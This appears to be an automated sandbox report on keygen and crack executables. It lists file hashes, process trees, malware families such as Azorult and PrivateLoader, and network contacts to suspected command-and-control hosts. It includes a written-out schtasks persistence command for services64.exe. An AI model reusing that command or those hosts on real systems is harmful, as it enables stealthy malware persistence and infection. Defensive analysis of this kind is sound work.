| SHA512 | 4a50e8c42da257287055f88369528eca7784ff0fb8b749b60f4324b312e85a6f6b500179178a9e382a93518650920e45fb0c985ad58caf31269cae05219e8661 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | 9bca4bb723492631598e89c7db9177a3 |
| SHA1 | 22d73a5b0c27af1d016df8518e7786e3c1201399 |
| SHA256 | ca8847bba444075938a8f2c7b29e3ecee3362a850a6b9f3b4f9d66532e731c8d |
| SHA512 | 6b6e73986e2217258442156c3c9c3f9b8892d804fda1434f6856c675795227797c88b26f08c475965518acf8f4e714f1ed199d985fa1a189c3a919c6923dc4af |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | 4a004655563d2e95bea768490e3acfa8 |
| SHA1 | c51e6a524ba74e0cacdd2d4c6a9f02f16d51210b |
| SHA256 | 25222fa360b5fd1e03473c31f1aee17aea21d2f70b5c1a3065ab7a96e9eb5599 |
| SHA512 | 3519c57a0d11f938a93bc37faa4b911c5ea1f4329b4c09129ff7d401f1c7631f2d009cf117fd7bb10d6942af47c418b8932cd742e57a60f9cb49019a0c5ab6b8 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | 48b6e48be491b062f6a0d939ca66fbfc |
| SHA1 | 0f2d8430072da3af55040bdcf67e2b8e96b229b0 |
| SHA256 | 0eb3cc70d19b9523295e17561720f312901a24a52084cb4c2790eb0d973095a2 |
| SHA512 | 53df084a7a04839507824711b3c5ab6c2f370eb1e13dd725b489d46cae1c8f6f0017cc0f9b6a2d043d18ebc0d22c3a886c4bced0aea2e17e2d58bf6eb7691c31 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | badf5bb987052f11491f39872ffd2169 |
| SHA1 | 13ba38f04fd3fd4e204464d808b1cbcbb8b5f7a1 |
| SHA256 | daed536fc3bcd25f337d5f48e9a6435f5eca0e89c18410659fb8540e0c095eb6 |
| SHA512 | 3b160543de68bc536e2c396fd3601a29ac4d3a535ebf90900a3cbd5a7d1831445ea90974cc3570924b3ce30fa42ae81dfef1ee065732ff7e6180ca4ee5c2b12c |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | 508ba0fe68175e182e5e14696119a9bc |
| SHA1 | 570d750e200f9715259abf48e5c31638e3a50d51 |
| SHA256 | e49b5782d78b7a99c21697a208396f38fe7535ec7a8db6f01e7bd24f86b62848 |
| SHA512 | 1a72742189ce2f321bff35321b12e6161a9d110dd6820e7df6de30b96835928302c3c129f33b64ea189fb6fee071cbab12a6c954e588de223d713bca0196c5b8 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | 24433079eb159fdce544f6a097ab1242 |
| SHA1 | 0a8233bc76442383c2743e0962423b429bb7bfc3 |
| SHA256 | 183713c6b7c759ff2958341dd8f6d95a9ed69cce2d58d6788a90bf2f423be11b |
| SHA512 | c818889cffa0f582b4933897ae2d4484d1202484ed467b6c69daeb0ec80a93432b25dcd8ba8c72846632c3c57185b5b5ef02e41fa7de71747337a2c1061f2a24 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | 9d3072fbbb780c2b6584e0611445304e |
| SHA1 | e700df586350b43928d099ce4273ee47357ab1c9 |
| SHA256 | 26b45ad09979a87d71923dac6576609caa94639b9261f48723e6dfb48f8dd069 |
| SHA512 | d243c02cd4b7638465b96cbdc06b068f67e81684e14ce6dd36e5b2395e01ff000e39e1bcabd94932c5df883617e90bc0ec1197b6730b2d6790a1756e2fbcba28 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | d655a9a0a5949af145903267d3de4dcc |
| SHA1 | 1c5d7526835eb963b14cc55238ba80afaefd1ad3 |
| SHA256 | 1a282b415fdd26b43b120a70bc41f4e3f2214d07b739a4f694c476f2c44320c6 |
| SHA512 | 2e33690dd22878e9dff391eeb5111edb29cf8cdb8a4b022828362c78c889d1a275765342890c4e483757d1bc9f11a1c82f0be3a7791cf3a9106fd3f6019a9a74 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | 211353552e7001eb427f834fd0f8732e |
| SHA1 | 32b990884120e6710d4714c6a2825f4a7da68513 |
| SHA256 | 0f38ab220f2c093272f6dc73ffae476568b450aedba194a3d08504535f39ce6d |
| SHA512 | 1c27e2a8fbd9a099c8daf195c3ccac3025dcfa2e0794b98ae2156b6cbb7028224d773f91b9fd6654a20e2ef9761859e4b4b7a58b9c7f590488c4e8f6fba80087 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | d25f8d4f11fa06b0a0c7924aa7e62bd1 |
| SHA1 | c37dd0cfd33abbd9e142af343f855444f8dc2eaf |
| SHA256 | 52624dd8cc8593ebcc06e6c81260fe5857bc68e3f52242884db957f81def0630 |
| SHA512 | c7f59de9b75d49f74f99b3c4e8548812206175b40c1f62ee84aa7c61c6046df3dc7e67b6769a51819886a4f2aecf5d379334e2deb3feb42e22dd242872627ee0 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | 9c0b4e94b57eb9472488a697c93d4247 |
| SHA1 | d83c839d80778e2c70050212c672bd0199f068b2 |
| SHA256 | 537ae468423b64e726bdc282ef30fb18b261dbc21af4884a7c7eac4b1fe7bada |
| SHA512 | d71e105556c327dab0821549d59303805780cf8ad0d1c87400dd1ee366cab98ecceae9e7589f2c2a1a8b026a8a0f65067e8f883551149b167a17d36e2a62028a |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | 9f8308f1eb9ad6bedaaa35c7941bd187 |
| SHA1 | 99ccbb847c19728ffc1eb0364e7eb29bd67a8853 |
| SHA256 | da7122cf85469966f2293a2cf9420026aed60ae9a952beedd49ec4f60dc97513 |
| SHA512 | 6be005db3ae6f24d43f4be2bf832b45d75618ef7e23634ef818f5489a426c126dc365342b7a4b1414a25feca88817e4043946656ae2e9592d3dc55fc6f22c922 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | 11e37a591df78e6a99b629d0c3aac0e1 |
| SHA1 | c01bf74778f858cb87f9fb09f9babb9ff577c6f0 |
| SHA256 | d2c70f30abf503b663e7f9f34b6c90f7f59ac202d94bc0cb54ecc1ce30e29072 |
| SHA512 | 01d8cbceff71f62883b37e9d63a6fe725eccea2ea56b5e1b54e19485d1795980f5059be037ed31b8d59d92504a2593fe793264ac7184af6ddbf4d6bf1b2c5140 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | a10d0140f399e5a9f39b26a38e5eeca9 |
| SHA1 | 72c64926775139e60f12e3e0fa1540f68e01725d |
| SHA256 | 2de64fd488c2aca77de784ad75e567b00f7b648f15edadffac826fa9f04d5477 |
| SHA512 | c24ed707dadb4d45f991a0cbbce4fb252396ecbdef4624f2f30945852f65b148e8dd5b77a9f722d596fb0a97fd32dd02a943be2deacdd7254f0abdfdf5135f62 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | b796f58d8a7bfa96cbd6dbd2f4618ac8 |
| SHA1 | 664d7f530aa7571ad1576c7cbf6160b3bdc22250 |
| SHA256 | dff590958b22e06e9dfa8b7e0380325f9233e6017608394efa40c62143a12abd |
| SHA512 | a0c6013ea89690cbc65a08466e0c3a0cd500aa8044ace5d94316550c2f931f6e960402e05cccc9489425ce4869b0a2ce0c832e356b5666f65d5c4474eb7427e8 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | 29f1917bcc5f8e57a183b7e322a5538d |
| SHA1 | 70a113da658dc96fe79defbf663103e06078647f |
| SHA256 | d0e02a1b9bc6559b10383907e90a2a9b3a519607205354effb54e0e603438322 |
| SHA512 | 22fc43246530b47c90db34156b89b72b4ccd83235935596b88d12b553f3e391eece74945ccef2a6f5f1f17b9d1365b0f054333479153724460240f209e61f91e |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | 4d198dc8b5537aafcf730de1dcff3f06 |
| SHA1 | a422f585d7a06ab4047c3e20684093ad267df519 |
| SHA256 | 2db81892c1a6eee9966e5a7a14f13e726b5f4e58df202d34a07e462af1b9a97d |
| SHA512 | 20eade490afadb2eee6787ab8c9767baf388bf6d67a46b2f3db4cf15130540e3c2b84a0d2b986f567e69428a1567a3f8fad76cc7a47def44d9e90bb104cad02b |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.INTEG.RAW
| MD5 | 57810caec9c9ed3bf2ab94c05906c73e |
| SHA1 | 25702f7e16d1214adfddf86f6bab7bf1cde58925 |
| SHA256 | c08384ed67e2029f1ad83f5fd5bb8e21c6c32986631c2f207d5545a15a3e9abc |
| SHA512 | 63edc99f8f3a5fa932471fb7fe63e296dec369311490bba45c0f3af3617f78ae74c37e15a24fdae1953fba697a5474d474a0b9e686f9b065061d221cac3d01fc |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm
| MD5 | c1d374bbf69940bd1c05f6aa8992ee04 |
| SHA1 | 5a6fb2a66b59b195f4aa67cf8a78ff4c8ad4a182 |
| SHA256 | 8ebfef9e3babc4dc4b79d2c6e0b96b7a53342c2af15d93ea63d4549c3435df24 |
| SHA512 | d5840a6dc572f3a3db2b393521fe054f02fa4c232f1868c365f550ef5c33699f98b154a77658d732382cedd21ac2a836c5c9f5d53d997cfd9b16d33741ae5abf |
memory/3192-683-0x0000000000400000-0x0000000000667000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe
| MD5 | 0388a1ce1bb8c076387b69ffcb3b40ec |
| SHA1 | 3ec08a53ec024d9be6346440848c37d0e0d7bb80 |
| SHA256 | 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a |
| SHA512 | ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe
| MD5 | 9a6071c1a67be3fb247f857fe5903bbf |
| SHA1 | 4a2e14763c51537e8695014007eceaf391a3f600 |
| SHA256 | 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c |
| SHA512 | c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68 |
memory/3624-703-0x0000000000C70000-0x0000000000C8E000-memory.dmp
memory/3624-704-0x0000000002CE0000-0x0000000002CFA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
| MD5 | 7009fb80a52366b6c2cd8ec052a65791 |
| SHA1 | db0894463edf3ac11e5ca4b4584e8f10d75810f6 |
| SHA256 | 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255 |
| SHA512 | 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079 |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 9910203407b2605107587e954081c575 |
| SHA1 | 8037bfb3b779fbbb3273df4f5c63d15b9589ce95 |
| SHA256 | 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49 |
| SHA512 | ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be |
memory/1380-733-0x00000000007F0000-0x00000000007F6000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 22:29
Reported
2024-11-08 22:32
Platform
win7-20240903-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-08 22:29
Reported
2024-11-08 22:32
Platform
win7-20241010-en
Max time kernel
13s
Max time network
19s
Command Line
Signatures
Azorult
Azorult family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | kvaka.li | udp |
Files
memory/2380-0-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-08 22:29
Reported
2024-11-08 22:32
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 736 wrote to memory of 3616 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 736 wrote to memory of 3616 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 736 wrote to memory of 3616 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104978 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.16.208.104.in-addr.arpa | udp |
Files
memory/736-1-0x0000000000A20000-0x0000000000B05000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
memory/3616-13-0x0000000000B40000-0x0000000000C25000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-08 22:29
Reported
2024-11-08 22:32
Platform
win7-20240903-en
Max time kernel
53s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Ffdroider family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jhuuee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 136
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | cleaner-partners.biz | udp |
| RU | 186.2.171.3:80 | 186.2.171.3 | tcp |
| RU | 186.2.171.3:443 | 186.2.171.3 | tcp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | remotenetwork.xyz | udp |
| US | 8.8.8.8:53 | startupmart.bar | udp |
| US | 8.8.8.8:53 | best-supply-link.xyz | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | gensolutions.bar | udp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| SG | 37.0.10.214:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| SG | 37.0.10.244:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| MX | 31.210.20.251:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| UA | 194.145.227.161:80 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
| MD5 | 7126148bfe5ca4bf7e098d794122a9a3 |
| SHA1 | 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64 |
| SHA256 | f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5 |
| SHA512 | 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48 |
\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
| MD5 | 8902f8193024fa4187ca1aad97675960 |
| SHA1 | 37a4840c9657205544790c437698b54ca33bfd9d |
| SHA256 | 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f |
| SHA512 | c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938 |
memory/2772-45-0x0000000000E70000-0x0000000001046000-memory.dmp
\Users\Admin\AppData\Local\Temp\chrome3.exe
| MD5 | 4b0d49f7c8712d7a0d44306309f2e962 |
| SHA1 | 5f0a2536f215babccf860c7ccdeaf7055bb59cad |
| SHA256 | f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60 |
| SHA512 | 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b |
\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
| MD5 | 13e802bd360e44591d7d23036ce1fd33 |
| SHA1 | 091a58503734848a4716382862526859299ef345 |
| SHA256 | e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b |
| SHA512 | 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b |
\Users\Admin\AppData\Local\Temp\2.exe
| MD5 | a5bace3c3c2fa1cb766775746a046594 |
| SHA1 | 9998cad5ba39e0be94347fcd2a2affd0c0a25930 |
| SHA256 | 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6 |
| SHA512 | 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184 |
\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 0ebb4afbb726f3ca17896a0274b78290 |
| SHA1 | b543a593cfa0cc84b6af0457ccdc27c1b42ea622 |
| SHA256 | 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2 |
| SHA512 | 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11 |
memory/3012-69-0x000000013FDE0000-0x000000013FDF0000-memory.dmp
memory/2484-70-0x00000000009A0000-0x00000000009A8000-memory.dmp
\Users\Admin\AppData\Local\Temp\jhuuee.exe
| MD5 | f9be28007149d38c6ccb7a7ab1fcf7e5 |
| SHA1 | eba6ac68efa579c97da96494cde7ce063579d168 |
| SHA256 | 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914 |
| SHA512 | 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171 |
